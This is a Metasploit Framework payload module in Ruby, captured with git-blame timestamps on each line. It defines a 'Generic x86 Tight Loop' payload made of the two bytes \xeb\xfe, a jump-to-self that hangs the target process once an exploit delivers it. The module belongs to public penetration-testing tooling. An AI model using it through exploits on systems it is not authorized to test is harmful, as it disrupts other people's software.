2010-04-14 07:40:04 +00:00
|
|
|
##
|
2010-04-30 08:40:19 +00:00
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
2010-04-14 07:40:04 +00:00
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2010-04-14 07:40:04 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'msf/core/payload/generic'
|
|
|
|
|
|
|
|
module Metasploit3
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Payload::Single
|
2010-04-14 07:40:04 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
super(merge_info(info,
|
|
|
|
'Name' => 'Generic x86 Tight Loop',
|
|
|
|
'Description' => 'Generate a tight loop in the target process',
|
|
|
|
'Author' => 'jduck',
|
2013-09-24 17:33:31 +00:00
|
|
|
'Platform' => %w{ bsd bsdi linux osx solaris win },
|
2013-08-30 21:28:54 +00:00
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Arch' => ARCH_X86,
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Payload' => "\xeb\xfe" # jump to self
|
|
|
|
}
|
|
|
|
))
|
|
|
|
end
|
2010-04-14 07:40:04 +00:00
|
|
|
|
|
|
|
end
|